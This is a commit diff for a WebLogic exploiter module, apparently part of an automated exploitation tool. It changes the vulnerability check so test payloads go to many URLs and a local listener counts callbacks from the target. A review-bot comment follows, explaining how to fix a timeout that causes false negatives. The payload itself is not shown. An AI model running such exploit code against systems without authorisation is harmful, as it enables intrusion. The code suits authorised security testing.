Improved the speed of weblogic exploiter
parent
c38793b527
commit
6073e9f677
|
@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||||
|
|
||||||
import threading
|
import threading
|
||||||
import logging
|
import logging
|
||||||
|
import time
|
||||||
|
|
||||||
__author__ = "VakarisZ"
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
# How long server waits for get request in seconds
|
# How long server waits for get request in seconds
|
||||||
SERVER_TIMEOUT = 4
|
SERVER_TIMEOUT = 4
|
||||||
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
|
# How long should be wait after each request in seconds
|
||||||
|
REQUEST_DELAY = 0.0001
|
||||||
|
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||||
REQUEST_TIMEOUT = 2
|
REQUEST_TIMEOUT = 2
|
||||||
# How long to wait for response in exploitation. In seconds
|
# How long to wait for response in exploitation. In seconds
|
||||||
EXECUTION_TIMEOUT = 15
|
EXECUTION_TIMEOUT = 15
|
||||||
|
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
|
||||||
print(e)
|
print(e)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
def add_vulnerable_urls(self, urls):
|
||||||
|
"""
|
||||||
|
Overrides parent method to use listener server
|
||||||
|
"""
|
||||||
# Server might get response faster than it starts listening to it, we need a lock
|
# Server might get response faster than it starts listening to it, we need a lock
|
||||||
httpd, lock = self._start_http_server()
|
httpd, lock = self._start_http_server()
|
||||||
|
exploitable = False
|
||||||
|
|
||||||
|
for url in urls:
|
||||||
|
if self.check_if_exploitable(url, httpd):
|
||||||
|
exploitable = True
|
||||||
|
break
|
||||||
|
|
||||||
|
if not exploitable and httpd.get_requests < 1:
|
||||||
|
# Wait for responses
|
||||||
|
time.sleep(REQUEST_TIMEOUT)
|
||||||
|
|
||||||
|
if httpd.get_requests > 0:
|
||||||
|
# Add all urls because we don't know which one is vulnerable
|
||||||
|
self.vulnerable_urls.extend(urls)
|
||||||
|
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
|
||||||
|
else:
|
||||||
|
LOG.info("No vulnerable urls found, skipping.")
|
||||||
|
|
||||||
|
self._stop_http_server(httpd, lock)
|
||||||
|
|
||||||
|
def check_if_exploitable(self, url, httpd):
|
||||||
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
||||||
try:
|
try:
|
||||||
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
|
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
||||||
except exceptions.ReadTimeout:
|
except exceptions.ReadTimeout:
|
||||||
# Our request does not get response thus we get ReadTimeout error
|
# Our request will not get response thus we get ReadTimeout error
|
||||||
pass
|
pass
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOG.error("Something went wrong: %s" % e)
|
LOG.error("Something went wrong: %s" % e)
|
||||||
self._stop_http_server(httpd, lock)
|
|
||||||
return httpd.get_requests > 0
|
return httpd.get_requests > 0
|
||||||
|
|
||||||
def _start_http_server(self):
|
def _start_http_server(self):
|
||||||
|
|
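Review bot: In `check_if_exploitable`, `timeout=REQUEST_DELAY` passes 0.0001 s as a single value, which requests applies to the connect phase as well as the read, so the call will probably fail with a connect timeout before the request is sent; that is not `ReadTimeout`, so it falls into the generic handler, logs "Something went wrong" and the host is reported as not vulnerable. Keeping a real connect timeout and shortening only the read, `timeout=(REQUEST_TIMEOUT, REQUEST_DELAY)`, keeps the speed-up without introducing false negatives into the assessment. In `add_vulnerable_urls`, `_stop_http_server(httpd, lock)` is reached only on the normal path; putting the loop and the wait in `try:` with the stop call under `finally:` guarantees the listener is closed if anything raises (for example in `get_test_payload`, which sits outside the `try` in `check_if_exploitable`). The docstring should also state that every entry in `urls` is recorded as vulnerable once any callback arrives, so `_exploit_info['vulnerable_urls']` is an over-approximation.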